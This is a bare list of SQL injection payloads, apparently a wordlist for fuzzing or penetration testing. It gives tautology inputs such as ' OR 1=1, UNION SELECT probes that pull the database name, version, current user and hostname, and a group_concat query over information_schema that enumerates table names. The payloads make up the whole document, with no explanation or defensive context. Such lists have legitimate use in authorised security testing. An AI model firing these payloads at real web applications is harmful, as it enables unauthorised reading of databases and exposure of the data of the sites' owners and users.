%20union%20select%201,2,user()--
SELECT * FROM nonexistent_table;
;
'
1=1
' OR 1=1
UNION ALL SELECT 123 --
1' UNION ALL SELECT 123 --
1' AND EXISTS(SELECT * FROM information_schema.tables WHERE table_schema=database() LIMIT 1) --
'OR 1 = 1 -- 
 union+select+1,2,3-
 union+select+1,2,database()-
 union select 1,2,version()-
 union select 1,2,user()-
 union select 1,2,@@hostname-
 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-
